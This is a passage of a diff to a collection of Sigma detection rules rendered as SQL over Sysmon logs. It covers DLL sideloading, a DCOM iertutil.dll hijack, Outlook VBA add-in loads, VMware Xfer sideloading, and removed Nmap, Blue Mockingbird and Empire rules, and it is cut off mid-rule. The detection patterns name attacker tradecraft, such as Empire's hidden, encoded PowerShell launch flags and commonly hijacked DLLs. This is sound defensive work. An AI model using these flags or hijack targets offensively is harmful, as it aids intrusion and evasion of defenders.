'%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND Image LIKE '%\\\\wldp.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" + "filename": "image_load_side_load_from_non_system_location.yml" }, { - "title": "PUA - Nmap/Zenmap Execution", - "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", + "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", "status": "test", - "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ - "Network administrator computer" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_nmap_zenmap.yml" + "filename": "image_load_dcom_iertutil_dll_hijack.yml" }, { - "title": "Blue Mockingbird", - "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", + "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "status": "test", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_blue_mockingbird.yml" + "filename": "image_load_office_outlook_outlvba_load.yml" }, { - "title": "HackTool - Empire PowerShell Launch Parameters", - "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "status": "test", - "description": "Detects suspicious powershell command line parameters used in Empire", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential DLL Sideloading Via VMware Xfer", + "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "status": "experimental", + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Other tools that incidentally use the same command line parameters" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' 